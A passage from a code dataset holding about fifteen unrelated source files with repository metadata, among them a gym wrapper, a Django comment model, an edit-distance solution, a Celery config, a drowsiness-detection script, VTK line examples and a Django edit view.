self.state_dim = self.env.observation_space.shape[0]
self._max_episode_steps = self.env._max_episode_steps
self.can_run = False
self.state = None
if type(self.env.action_space) == gym.spaces.box.Box : #Continuous
self.action_dim = self.env.action_space.shape[0]
self.is_discrete = False
else :
self.action_dim = self.env.action_space.n
self.is_discrete = True
def reset(self):
assert not self.can_run
self.can_run = True
self.state = self.env.reset()
return self.state
def step(self,action):
assert self.can_run
next_state, reward, done, info = self.env.step(action)
self.state = next_state
        if done:
self.can_run = False
return next_state, reward, done, info
|
[
"[email protected]"
] | |
e5679a098872822f28be752dec6bb6519196d5b7
|
8a5ab3d33e3b653c4c64305d81a85f6a4582d7ac
|
/PySide/QtCore/QTimer.py
|
5e91243992b9f324a3a089a65f93db3242e8a538
|
[
"Apache-2.0"
] |
permissive
|
sonictk/python-skeletons
|
be09526bf490856bb644fed6bf4e801194089f0d
|
49bc3fa51aacbc2c7f0c7ab86dfb61eefe02781d
|
refs/heads/master
| 2020-04-06T04:38:01.918589 | 2016-06-09T20:37:43 | 2016-06-09T20:37:43 | 56,334,503 | 0 | 0 | null | 2016-04-15T16:30:42 | 2016-04-15T16:30:42 | null |
UTF-8
|
Python
| false | false | 1,511 |
py
|
# encoding: utf-8
# module PySide.QtCore
# from /corp.blizzard.net/BFD/Deploy/Packages/Published/ThirdParty/Qt4.8.4/2015-05-15.163857/prebuilt/linux_x64_gcc41_python2.7_ucs4/PySide/QtCore.so
# by generator 1.138
# no doc
# no imports
from QObject import QObject
class QTimer(QObject):
# no doc
def interval(self, *args, **kwargs): # real signature unknown
pass
def isActive(self, *args, **kwargs): # real signature unknown
pass
def isSingleShot(self, *args, **kwargs): # real signature unknown
pass
def killTimer(self, *args, **kwargs): # real signature unknown
pass
def setInterval(self, *args, **kwargs): # real signature unknown
pass
def setSingleShot(self, *args, **kwargs): # real signature unknown
pass
def singleShot(self, *args, **kwargs): # real signature unknown
pass
def start(self, *args, **kwargs): # real signature unknown
pass
def startTimer(self, *args, **kwargs): # real signature unknown
pass
def stop(self, *args, **kwargs): # real signature unknown
pass
def timerEvent(self, *args, **kwargs): # real signature unknown
pass
def timerId(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *more): # real signature unknown; restored from __doc__
""" x.__init__(...) initializes x; see help(type(x)) for signature """
pass
staticMetaObject = None
timeout = None
__new__ = None
|
[
"[email protected]"
] | |
800613bb979e2a651e7833167d3b6536f748963a
|
699add6df73ad158b8ebeb5f9de4aada5820f205
|
/facebook/app/posts/models/comments.py
|
51bab010f0aef4c5c779bd1f65e15e568916fbfe
|
[] |
no_license
|
ricagome/Api-Facebook-Clone
|
4f035ad280e6cb48d375fd87a9f62eecce67eb51
|
fae5c0b2e388239e2e32a3fbf52aa7cfd48a7cbb
|
refs/heads/main
| 2023-08-17T12:34:33.379017 | 2021-10-05T21:23:32 | 2021-10-05T21:23:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 694 |
py
|
"""Comment model."""
# Django
from django.db import models
# Utilities
from app.utils.models import FbModel
class Comment(FbModel):
"""Comment model."""
user = models.ForeignKey('users.User', on_delete=models.CASCADE)
profile = models.ForeignKey('users.Profile', on_delete=models.CASCADE)
post = models.ForeignKey('posts.Post', on_delete=models.CASCADE)
text = models.TextField(help_text='write a comment', max_length=250)
reactions = models.IntegerField(default=0)
def __str__(self):
"""Return username, post title and comment."""
return '@{} has commented {} on {}'.format(
self.user.username,
self.text, self.post)
|
[
"[email protected]"
] | |
5483a62a0289eaf03b82b517c8e78dd11f7e8a9d
|
4a2f163e603f90d5b9a4b2a100d7bc7bc77d1c95
|
/predicting_biological_response/hemy_example.py
|
401b7f3d5dd2f883930c7bfdf5ca5cfa2b058519
|
[] |
no_license
|
tusonggao/data_cck
|
d781334bd1d425f6ecd613ebdb194835846e3adb
|
91d48589e8431fd00d70348dcb049c52fdcd2c7f
|
refs/heads/master
| 2020-04-09T03:59:09.931284 | 2020-01-26T15:54:14 | 2020-01-26T15:54:14 | 160,005,725 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 155 |
py
|
# https://blog.csdn.net/data_scientist/article/details/79036382
# https://blog.csdn.net/Gin077/article/details/84339790
# https://github.com/rushter/heamy
|
[
"[email protected]"
] | |
88e7be6d96ec8e784aba5e12b0692d4c5beb1949
|
2db7597686f33a0d700f7082e15fa41f830a45f0
|
/Python/LeetCode2.0/DP/72.Edit Distance.py
|
b071302d4d3bdf3daf32936c19f8404f75c65131
|
[] |
no_license
|
Leahxuliu/Data-Structure-And-Algorithm
|
04e0fc80cd3bb742348fd521a62bc2126879a70e
|
56047a5058c6a20b356ab20e52eacb425ad45762
|
refs/heads/master
| 2021-07-12T23:54:17.785533 | 2021-05-17T02:04:41 | 2021-05-17T02:04:41 | 246,514,421 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,595 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time : 2020/05/09
'''
input: two words: str; the length of word is from 0 to inf
output: int; the number of modify steps
corner case:
    one of the words is '' → the length of the other word
both words are ‘’ → 0
Method - DP
Steps:
build DP table; the size of table is (len(word1) + 1)* (len(word2) + 1)
dp[i][j]: the optimal solution when the size of word1 is i, the size of word2 is j
    dp[i][j] = dp[i-1][j-1],                                   if word1[i - 1] == word2[j - 1]
             = min(dp[i][j-1], dp[i-1][j], dp[i-1][j-1]) + 1,  if word1[i - 1] != word2[j - 1]
result is dp[len(word2)][len(word1)]
base case:
dp[0][j] = j
dp[i][0] = i
Time Complexity: O(NM), N is the length of word1 and M is the length of word2
Space Complexity: O(NM), DP table’s size
'''
# Easy to get wrong: note which word maps to the rows and which to the columns; in word1[i - 1] != word2[j - 1], don't forget the -1 offset
class Solution:
def minDistance(self, word1: str, word2: str) -> int:
m = len(word1)
n = len(word2)
if m == 0:
return n
if n == 0:
return m
dp = [[0] * (m + 1) for _ in range(n + 1)]
for i in range(n + 1):
for j in range(m + 1):
if i == 0:
dp[i][j] = j
elif j == 0:
dp[i][j] = i
elif word2[i - 1] == word1[j - 1]:
dp[i][j] = dp[i - 1][j - 1]
else:
dp[i][j] = min(dp[i][j - 1], dp[i - 1][j], dp[i - 1][j - 1]) + 1
return dp[n][m]
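
# Hedged usage sketch (illustrative inputs, not part of the original solution file):
# "horse" -> "ros" requires 3 edits (replace h->r, delete r, delete e).
if __name__ == "__main__":
    assert Solution().minDistance("horse", "ros") == 3
    assert Solution().minDistance("", "abc") == 3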
|
[
"[email protected]"
] | |
9aa84188689bfa3d627c30002874472a97dc229a
|
499ff5445e2017d042690c0429cf2e767a7f623f
|
/coral/io/_abi.py
|
b19a2ab0ec287ad6d000026ece9b71f749677f3a
|
[
"MIT"
] |
permissive
|
blthree/coral
|
b6ab934c10271d7b790130fe45e622b7c66921b4
|
30514735d9a51487583535a3a7e3fbfd0fe15ed8
|
refs/heads/master
| 2021-01-22T10:14:52.018579 | 2017-02-19T00:28:33 | 2017-02-19T00:28:33 | 81,997,699 | 0 | 0 | null | 2017-02-14T22:58:59 | 2017-02-14T22:58:59 | null |
UTF-8
|
Python
| false | false | 3,069 |
py
|
'''Read and write DNA sequences.'''
import coral as cr
import numpy as np
import os
from . import parsers
from .exceptions import UnsupportedFileError
def read_abi(path, trim=True, attach_trace=True):
'''Read a single ABI/AB1 Sanger sequencing file.
:param path: Full path to input file.
:type path: str
:param trim: Determines whether the sequence will be trimmed using Richard
Mott's algorithm (trims based on quality).
:type trim: bool
:param attach_trace: Determines whether to attach the trace result as a
.trace attribute of the returned sequence and the
trace peak locations as a .tracepeaks attribute. The
trace attribute is a 2D numpy array with 4 columns in
the order GATC.
:type attach_trace: bool
:returns: DNA sequence.
:rtype: coral.DNA
'''
filename, ext = os.path.splitext(os.path.split(path)[-1])
abi_exts = ['.abi', '.ab1']
if ext in abi_exts:
with open(path) as f:
abi = parsers.ABI(f)
else:
raise UnsupportedFileError('File format not recognized.')
seq = abi.seq_remove_ambig(abi.seq)
# Attach the trace results to the seq
if attach_trace:
order = abi.data['baseorder'].upper()
trace = [abi.data['raw' + str(order.index(b) + 1)] for b in 'GATC']
trace = np.array(trace)
tracepeaks = np.array(abi.data['tracepeaks'])
    if trim:
        try:
            sequence = cr.DNA(abi.trim(seq))
        except ValueError:
            # A ValueError is raised if the sequence is too short to trim;
            # fall back to the untrimmed sequence so `sequence` is always bound.
            sequence = cr.DNA(seq)
        else:
            if attach_trace:
                trim_start = seq.index(str(sequence))
                # Adjust trace data based on trimming
                idx = (trim_start, trim_start + len(sequence))
                peaks = tracepeaks[idx[0]:idx[1]]
                sequence.trace = trace[peaks[0]:peaks[-1], :]
                sequence.tracepeaks = peaks
    else:
        sequence = cr.DNA(seq)
sequence.name = abi.name
return sequence
def read_abis(directory, trim=True, attach_trace=True):
'''Read all ABI sequences files in a directory.
:param directory: Path to directory containing sequencing files.
:type directory: str
:param trim: Determines whether the sequence will be trimmed using Richard
Mott's algorithm (trims based on quality).
:type trim: bool
:param attach_trace: Determines whether to attach the trace result as a
.trace attribute of the returned sequence. The trace
attribute is a 2D numpy array with 4 columns in the
order GATC.
:type attach_trace: bool
:returns: A list of DNA sequences.
:rtype: coral.DNA list
'''
dirfiles = os.listdir(directory)
abis = []
for dirfile in dirfiles:
path = os.path.join(directory, dirfile)
try:
abis.append(read_abi(path, trim=trim, attach_trace=attach_trace))
except UnsupportedFileError:
pass
return abis
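
# Hedged usage sketch (not part of the original module): pass the path to an .ab1
# file on the command line and the parsed trace name is printed.
if __name__ == '__main__':
    import sys
    if len(sys.argv) > 1:
        record = read_abi(sys.argv[1], trim=True, attach_trace=True)
        print(record.name)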
|
[
"[email protected]"
] | |
0d3b60023a60eed6ae0274a83fd1daecbd04b513
|
95749b75c446df3ce4aabb03d5aec90de793e207
|
/gemini/taskapp/celery.py
|
722f621c5679f886e12c4c93ba9692df4ba43474
|
[] |
no_license
|
Hawk94/gemini
|
8288a11499c4cc12c8c79641a51b5e99afe268c5
|
3a4d0b13488b8e9fbc40dc3cde338b61bc04b494
|
refs/heads/master
| 2020-06-24T11:37:22.204269 | 2017-07-12T20:33:21 | 2017-07-12T20:33:21 | 96,935,334 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,398 |
py
|
import os
from celery import Celery
from django.apps import apps, AppConfig
from django.conf import settings
if not settings.configured:
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local') # pragma: no cover
app = Celery('gemini')
class CeleryConfig(AppConfig):
name = 'gemini.taskapp'
verbose_name = 'Celery Config'
def ready(self):
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
installed_apps = [app_config.name for app_config in apps.get_app_configs()]
app.autodiscover_tasks(lambda: installed_apps, force=True)
if hasattr(settings, 'RAVEN_CONFIG'):
# Celery signal registration
from raven import Client as RavenClient
from raven.contrib.celery import register_signal as raven_register_signal
from raven.contrib.celery import register_logger_signal as raven_register_logger_signal
raven_client = RavenClient(dsn=settings.RAVEN_CONFIG['DSN'])
raven_register_logger_signal(raven_client)
raven_register_signal(raven_client)
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request)) # pragma: no cover
|
[
"[email protected]"
] | |
346dfc71b0db9a749e8ee1d65b7425c276ff9cb1
|
4577d8169613b1620d70e3c2f50b6f36e6c46993
|
/students/1797637/homework01/program03.py
|
1dea672b0e9890cc0e4a8907a314950ef5731495
|
[] |
no_license
|
Fondamenti18/fondamenti-di-programmazione
|
cbaf31810a17b5bd2afaa430c4bf85d05b597bf0
|
031ec9761acb1a425fcc4a18b07884b45154516b
|
refs/heads/master
| 2020-03-24T03:25:58.222060 | 2018-08-01T17:52:06 | 2018-08-01T17:52:06 | 142,419,241 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,579 |
py
|
def codifica(chiave, testo):
    ''' Encode and return a text, given the text itself and an encoding key'''
codifica=codifica_chiave(chiave)
for indice,carattere in enumerate(testo):
if carattere in codifica.keys(): testo = testo[:indice]+ testo[indice:].replace(testo[indice],codifica[carattere],1)
return testo
def decodifica(chiave, testo):
    ''' Decode and return a text, given the text itself and an encoding key'''
decodifica=decodifica_chiave(chiave)
for indice,carattere in enumerate(testo):
if carattere in decodifica.keys(): testo = testo[:indice]+ testo[indice:].replace(testo[indice],decodifica[carattere],1)
return testo
def codifica_chiave(chiave):
chiave=processa_chiave(chiave)
chiave_ord=''.join(sorted(chiave))
codifica={}
for indice,carattere in enumerate(chiave_ord): codifica[carattere]=chiave[indice]
return codifica
def decodifica_chiave(chiave):
chiave=processa_chiave(chiave)
chiave_ord=''.join(sorted(chiave))
decodifica={}
for indice,carattere in enumerate(chiave): decodifica[carattere]=chiave_ord[indice]
return decodifica
def processa_chiave(chiave):
for carattere in chiave:
if ord(carattere)<ord('a') or ord(carattere)>ord('z'): chiave= chiave.replace(carattere,'')
chiave=elimina_copie(chiave)
return chiave
def elimina_copie(chiave):
for carattere in chiave:
if carattere in chiave[chiave.find(carattere)+1:]: chiave= chiave.replace(carattere,'',1)
return chiave
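
# Hedged round-trip sketch (illustrative key and text, not part of the original exercise):
# decoding an encoded text with the same key should return the original text.
if __name__ == '__main__':
    cifrato = codifica('chiave', 'testo segreto')
    assert decodifica('chiave', cifrato) == 'testo segreto'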
|
[
"[email protected]"
] | |
8ccd44a76e64b8cc0ad921f213460c409e895266
|
cc7b4e71b3c27240ec650a75cc6f6bbab5e11387
|
/crdb/templatetags/email_tags.py
|
b13eedd6c32b7950e6ee3313c89e155c42547e14
|
[
"MIT"
] |
permissive
|
jsayles/CoworkingDB
|
0cdada869d950a28cfef20d1b9c1eb3eb4d7b1c2
|
78776910eba0354a7fd96b2e2c53a78e934d8673
|
refs/heads/master
| 2023-02-22T23:11:19.040799 | 2021-12-28T19:13:39 | 2021-12-28T19:13:39 | 883,951 | 3 | 0 |
MIT
| 2023-02-15T17:59:10 | 2010-09-02T18:36:43 |
Python
|
UTF-8
|
Python
| false | false | 764 |
py
|
import os
from django.template import Library
from django import template
from django.conf import settings
from django.utils.html import format_html
from django.urls import reverse
from crdb.models import EmailAddress
register = template.Library()
@register.simple_tag
def email_verified(email):
if not email:
return None
if not isinstance(email, EmailAddress):
# Got a string so we should pull the object from the database
email = EmailAddress.objects.get(email=email)
if email.is_verified():
return ""
html = '<span style="color:red;">( <a target="_top" style="color:red;" href="{}">{}</a> )</span>'
link = email.get_send_verif_link()
label = "Not Verified"
return format_html(html, link, label)
|
[
"[email protected]"
] | |
e8b2f8c81f953e4c0e4a8d266dceb71804203e01
|
7f25740b1ef47edc24db1a3618b399959b073fe1
|
/1029_17_smallproject.py
|
97673d239a34ef5759856f9eeba050bcf1977446
|
[] |
no_license
|
pjh9362/PyProject
|
b2d0aa5f8cfbf2abbd16232f2b55859be50446dc
|
076d31e0055999c1f60767a9d60e122fb1fc913e
|
refs/heads/main
| 2023-01-09T12:12:06.913295 | 2020-11-07T15:32:03 | 2020-11-07T15:32:03 | 306,814,117 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 198 |
py
|
cost = int(input())
cpn = input()
if cpn == "Cash3000":
print(cost-3000)
elif cpn == "Cash5000":
print(cost-5000)
else:
print("쿠폰이 적용되지 않았습니다.")
print(cost)
|
[
"[email protected]"
] | |
385836ada1f0c7aa8919ec7aeb97acca6aea94c0
|
644b13f90d43e9eb2fae0d2dc580c7484b4c931b
|
/network2.py
|
5dbc8833c5526d15e355e3169680c46c4a5bc280
|
[] |
no_license
|
yeonnseok/ps-algorithm
|
c79a41f132c8016655719f74e9e224c0870a8f75
|
fc9d52b42385916344bdd923a7eb3839a3233f18
|
refs/heads/master
| 2020-07-09T11:53:55.786001 | 2020-01-26T02:27:09 | 2020-01-26T02:27:09 | 203,962,358 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,318 |
py
|
def cal_ans():
temp = []
ans = 0
for i in range(len(src)):
if src[i] == 0:
if len(temp) == 5:
temp = temp[1:]
temp.append(i)
else:
ans += i * len(temp) - sum(temp)
for j in temp:
link[i + 1].append(j + 1)
link[j + 1].append(i + 1)
return ans
def cal_group():
cnt, group = 0, 0
zero_one = False
start, end = -1, 0
for i in range(len(src)):
start = i + 1
if src[i] == 1:
group += 1
else:
break
for i in range(len(src) - 1, -1, -1):
end = i + 1
if src[i] == 0:
group += 1
else:
break
for i in range(start, end):
if src[i] == 0:
cnt += 1
elif src[i] == 1:
if cnt >= 5:
group += (cnt - 4)
elif i >= 1 and src[i-1] == 0:
zero_one = True
cnt = 0
if zero_one and len(src) != 1:
return group + 1
return group
num_of_case = int(input())
for case in range(1, num_of_case + 1):
n = int(input())
src = list(map(int, input().split()))
link = [[] for _ in range(n + 1)]
print("#%d" % case, end=" ")
print(cal_ans(), end=" ")
print(cal_group())
|
[
"[email protected]"
] | |
ab0b8196c759f436a72d4ad731e16756cc9d4511
|
699cf40f6326b954a40b78e87317a62401bd4c2c
|
/.history/Drowsy_Detection_20210728124624.py
|
935884724404299f8e03c238ed4ff5289a4858c5
|
[] |
no_license
|
KhanhNguyen1308/Python-mediapippe
|
e3927f9c0c6499d8a3ba50a675617b89197dce89
|
981412efd39bd29c34a66afbec88abdabcb47ab9
|
refs/heads/main
| 2023-06-25T18:37:43.234063 | 2021-07-29T11:35:31 | 2021-07-29T11:35:31 | 368,535,068 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,727 |
py
|
import cv2
import time
import numpy as np
import mediapipe as mp
import tensorflow as tf
from threading import Thread
from head_pose_ratio import head_pose_ratio
from function import draw_point, eye_avg_ratio, put_text
from Angle_head_pose_ratio import head_pose_status, eye_stat
from mode import sleep_mode
interpreter = tf.lite.Interpreter('model.tflite')
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
cap = cv2.VideoCapture('Video/test_1406.mp4')
# cap = cv2.VideoCapture(0)
pTime = 0
time_active = 0
m = 0
status = ''
mpDraw = mp.solutions.drawing_utils
mpFaceMesh = mp.solutions.face_mesh
faceMesh = mpFaceMesh.FaceMesh()
drawSpec = mpDraw.DrawingSpec(thickness=1, circle_radius=2)
eye_status = ''
x_status = ''
y_status = ''
z_status = ''
head_status = ''
Drowsy_mode = ''
draw = False
t = 0
ear = 0
start_time = time.time()
count = 0
blink = 0
blink_perM = 0
pre_blink = 0
while True:
ret, img = cap.read()
ih, iw = img.shape[0], img.shape[1]
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
results = faceMesh.process(imgRGB)
if results:
face = []
Mount = []
Left_eye = []
Right_eye = []
try:
for face_lms in results.multi_face_landmarks:
for lm in face_lms.landmark:
x, y = int(lm.x * iw), int(lm.y * ih)
face.append([x, y])
nose = face[5]
Left_eye.append([face[249], face[374], face[380], face[382], face[385], face[386]])
Right_eye.append([face[7], face[145], face[153], face[155], face[158], face[159]])
Mount.append([face[308], face[317], face[14], face[87], face[61], face[82], face[13], face[312]])
img = draw_point(img, nose, Left_eye, Right_eye, Mount)
ear = eye_avg_ratio(Left_eye, Right_eye)
x1, x2, x3, x4, x5, x6 = head_pose_ratio(nose, Left_eye, Right_eye)
input_shape = input_details[0]['shape']
input_data = np.array((x1, x2, x3, x4, x5, x6), dtype=np.float32)
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
img = cv2.putText(img, str(x5), (nose[0] - 20, nose[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
img = cv2.putText(img, str(x6), (nose[0] + 20, nose[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 1)
head_status, mode = head_pose_status(x5, x6, x2)
eye_status, blink, count = eye_stat(ear, count, blink, mode)
if mode == 1:
print(round(ear, 3))
Drowsy_mode = sleep_mode(mode, ear, blink)
m += 1
except:
eye_status = 'None Face'
x_status = 'None Face'
y_status = 'None Face'
cTime = time.time()
fps = int(1 / (cTime - pTime))
pTime = cTime
img = cv2.putText(img, str(m), (10, 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 1)
text_fps = 'FPS:' + str(fps)
text_EaR = 'Eye_avg_Ratio: ' + str(round(ear, 2))
text_Head_pose = 'Head_pose: ' + head_status
text_ES = 'Eye_Status: ' + eye_status
text_blink = 'Blink_Num: ' + str(blink)
text_blink_avg = 'Blink_AVG: ' + str(blink_perM)
img = put_text(img, text_fps, text_EaR, text_ES, text_blink, text_blink_avg, text_Head_pose)
cv2.imshow('results', img)
if (time.time() - start_time) > 60:
start_time = time.time()
time_active += 1
blink_perM = blink
pre_blink = blink
blink = 0
key = cv2.waitKey(1)
# if m == 900:
# break
if key == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
[
"[email protected]"
] | |
181d7604566e31eea4b774b2ae9b3356926009e6
|
a40950330ea44c2721f35aeeab8f3a0a11846b68
|
/VTK/Actors/ThreeLine.py
|
e780418bfccbe2f4be8ca077eaf8f0c68c4225b5
|
[] |
no_license
|
huang443765159/kai
|
7726bcad4e204629edb453aeabcc97242af7132b
|
0d66ae4da5a6973e24e1e512fd0df32335e710c5
|
refs/heads/master
| 2023-03-06T23:13:59.600011 | 2023-03-04T06:14:12 | 2023-03-04T06:14:12 | 233,500,005 | 3 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,218 |
py
|
import vtk
# Visualize
colors = vtk.vtkNamedColors()
# Create points
p0 = [0.0, 0.0, 0.0]
p1 = [1.0, 0.0, 0.0]
p2 = [1.0, 1.0, 0.0]
p3 = [0.0, 1.0, 0.0]
p4 = [2.0, 0.0, 0.0]
p5 = [2.0, 1.0, 0.0]
# LineSource: draw a line with two points
def createLine1():
lineSource = vtk.vtkLineSource()
lineSource.SetPoint1(p1)
lineSource.SetPoint2(p2)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(lineSource.GetOutputPort())
return mapper
# LineSource Multi-point continuous straight line
def createLine2():
lineSource = vtk.vtkLineSource()
points = vtk.vtkPoints()
points.InsertNextPoint(p0)
points.InsertNextPoint(p1)
points.InsertNextPoint(p2)
points.InsertNextPoint(p3)
lineSource.SetPoints(points)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(lineSource.GetOutputPort())
return mapper
# LineSource multi-point set geometry + topology
def createLine3():  # add several lines: a single points actor carries multiple line segments
# Create a vtkPoints object and store the points in it
points = vtk.vtkPoints()
points.InsertNextPoint(p0)
points.InsertNextPoint(p1)
points.InsertNextPoint(p2)
points.InsertNextPoint(p3)
points.InsertNextPoint(p4)
points.InsertNextPoint(p5)
# Create a cell array to store the lines in and add the lines to it
lines = vtk.vtkCellArray()
# for i in range(0, 5, 2):
# line = vtk.vtkLine()
# line.GetPointIds().SetId(0, i)
# line.GetPointIds().SetId(1, i + 1)
# lines.InsertNextCell(line)
    line = vtk.vtkLine()  # defaults to 2 endpoints
    # print(line.GetPointIds())
    # line.GetPointIds().SetNumberOfIds(4)  # can be set to N endpoints
    line.GetPointIds().SetId(0, 0)  # SetId's first argument is the endpoint index, the second is the point ID
line.GetPointIds().SetId(1, 1)
lines.InsertNextCell(line)
line.GetPointIds().SetId(0, 1)
line.GetPointIds().SetId(1, 4)
# line.GetPointIds().SetId(2, 4)
lines.InsertNextCell(line)
# Create a polydata to store everything in
linesPolyData = vtk.vtkPolyData()
# Add the points to the dataset geometry
linesPolyData.SetPoints(points)
# Add the lines to the dataset topology
linesPolyData.SetLines(lines)
# Setup actor and mapper
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputData(linesPolyData)
return mapper
def main():
renderer = vtk.vtkRenderer()
renderWindow = vtk.vtkRenderWindow()
renderWindow.SetWindowName("Line")
renderWindow.AddRenderer(renderer)
renderWindowInteractor = vtk.vtkRenderWindowInteractor()
renderWindowInteractor.SetRenderWindow(renderWindow)
# Visualize
colors = vtk.vtkNamedColors()
renderer.SetBackground(colors.GetColor3d("Silver"))
actor = vtk.vtkActor()
# The first way
# actor.SetMapper(createLine1())
# The second way
# actor.SetMapper(createLine2())
# The third way
actor.SetMapper(createLine3())
actor.GetProperty().SetLineWidth(4)
actor.GetProperty().SetColor(colors.GetColor3d("Peacock"))
renderer.AddActor(actor)
renderWindow.Render()
renderWindowInteractor.Start()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
18eaf4480da5398f037854fd148de9adc33abbe1
|
d8940b6d45c15a84c8ee1ab298c4df8a905f956c
|
/pysnooper/__init__.py
|
4b6ea5bc1ee65f9e361836555c20c181a5e8e0ff
|
[
"MIT"
] |
permissive
|
Karanxa/PySnooper
|
f179c3e23627979c3a58664b966c9ae4cfa522a2
|
22f63ae09bb6d63de86496d613815ee03d191b75
|
refs/heads/master
| 2023-05-27T14:23:00.604201 | 2021-06-11T15:06:55 | 2021-06-11T15:06:55 | 376,061,317 | 1 | 0 |
MIT
| 2021-06-11T15:06:55 | 2021-06-11T15:04:02 | null |
UTF-8
|
Python
| false | false | 812 |
py
|
# Copyright 2019 Ram Rachum and collaborators.
# This program is distributed under the MIT license.
'''
PySnooper - Never use print for debugging again
Usage:
import pysnooper
@pysnooper.snoop()
def your_function(x):
...
A log will be written to stderr showing the lines executed and variables
changed in the decorated function.
For more information, see https://github.com/cool-RR/PySnooper
'''
from .tracer import Tracer as snoop
from .variables import Attrs, Exploding, Indices, Keys
import collections
__VersionInfo = collections.namedtuple('VersionInfo',
('major', 'minor', 'micro'))
__version__ = '0.5.0'
__version_info__ = __VersionInfo(*(map(int, __version__.split('.'))))
del collections, __VersionInfo # Avoid polluting the namespace
|
[
"[email protected]"
] | |
6017f8bc5e80a39ea78cc67cbc7474a53ad39874
|
4d259f441632f5c45b94e8d816fc31a4f022af3c
|
/tornado/mongodb/client.py
|
df52fa27df3ea41b18e3d682e2bcf182a9f48e30
|
[] |
no_license
|
xiaoruiguo/lab
|
c37224fd4eb604aa2b39fe18ba64e93b7159a1eb
|
ec99f51b498244c414b025d7dae91fdad2f8ef46
|
refs/heads/master
| 2020-05-25T01:37:42.070770 | 2016-05-16T23:24:26 | 2016-05-16T23:24:26 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,204 |
py
|
import httplib2
from urllib import urlencode
h = httplib2.Http()
## Add articles
data = {'id':'1', 'author':'B', 'genre':'comedy'}
body = urlencode(data)
h.request("http://127.0.0.1:8888/articles", "POST", body=body)
data = {'id':'1', 'author':'C', 'genre':'comedys'}
body = urlencode(data)
h.request("http://127.0.0.1:8888/articles", "POST", body=body)
data = {'id':'2', 'author':'A', 'genre':'tragedy'}
body = urlencode(data)
h.request("http://127.0.0.1:8888/articles", "POST", body=body)
data = {'id':'3', 'author':'X', 'genre':'tragedy'}
body = urlencode(data)
h.request("http://127.0.0.1:8888/articles", "POST", body=body)
## View all articles
# httplib2's request() returns (response, content) in that order
response, content = h.request("http://127.0.0.1:8888/articles", "GET")
print '------- all articles -------'
print content
## View articles
print '------- per articles -------'
data = {"articleid":1}
data = urlencode(data)
response, content = h.request("http://127.0.0.1:8888/articles" + "?" + data, "GET")
#for res in content:
#    print res
print content
## Delete articles
#content, response = h.request("http://127.0.0.1:8888/articles", "DELETE")
#content, response = h.request("http://127.0.0.1:8888/articles", "GET")
#print response
|
[
"[email protected]"
] | |
3a0f200b06d77ef08f908fd0474fe8e95f74cb21
|
b68fea9d645de59ee31da970d3dc435460fde9de
|
/discussboard/views_edit.py
|
a7cc8324343a334ab42398e43c09249b9d270868
|
[
"BSD-3-Clause"
] |
permissive
|
shagun30/djambala-2
|
03fde4d1a5b2a17fce1b44f63a489c30d0d9c028
|
06f14e3dd237d7ebf535c62172cfe238c3934f4d
|
refs/heads/master
| 2021-01-10T04:20:30.735479 | 2008-05-22T05:02:08 | 2008-05-22T05:02:08 | 54,959,603 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,026 |
py
|
# -*- coding: utf-8 -*-
"""
/dms/discussboard/views_edit.py
.. contains the view for editing the properties of the discussion board
Django content Management System
Hans Rauch
[email protected]
The programs of the dms system may be used freely and adapted
to specific needs.
0.02 21.05.2008 get_role_choices
0.01 12.07.2007 start of work
"""
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django import newforms as forms
from django.db import transaction
from django.utils.translation import ugettext as _
from dms.queries import get_site_url
from dms.roles import *
from dms.utils import get_tabbed_form
from dms.utils import info_slot_to_header
from dms.utils import get_parent_section_choices
from dms.utils import remove_link_icons
from dms.utils import get_choices_new_protected
from dms.utils_form import get_folderish_vars_edit
from dms.encode_decode import decode_html
from dms.discussboard.utils import get_dont
from dms.discussboard.help_form import help_form
from dms_ext.extension import *  # override dms functions
# -----------------------------------------------------
@require_permission('perm_edit_folderish')
def discussboard_edit(request, item_container):
""" Eigenschaften des Ordners aendern """
params = request.GET.copy()
profi_mode = params.has_key('profi')
@transaction.commit_manually
def save_values(item_container, old, new):
""" Abspeichern der geaenderten Werte """
item_container.container.save_values(old, new)
item_container.item.save_values(old, new)
item_container.save_modified_values(old, new)
transaction.commit()
class dms_itemForm ( forms.Form ) :
title = forms.CharField(max_length=240,
widget=forms.TextInput(attrs={'size':60}) )
nav_title = forms.CharField(max_length=60,
widget=forms.TextInput(attrs={'size':30}) )
sub_title = forms.CharField(required=False, max_length=240,
widget=forms.TextInput(attrs={'size':60}) )
text = forms.CharField(required=False,
widget=forms.Textarea(attrs={'rows':5, 'cols':60, 'id':'ta',
'style':'width:100%;'}) )
text_more = forms.CharField(required=False,
widget=forms.Textarea(attrs={'rows':10, 'cols':60, 'id':'ta1',
'style':'width:100%;'}) )
image_url = forms.CharField(required=False, max_length=200,
widget=forms.TextInput(attrs={'size':60}) )
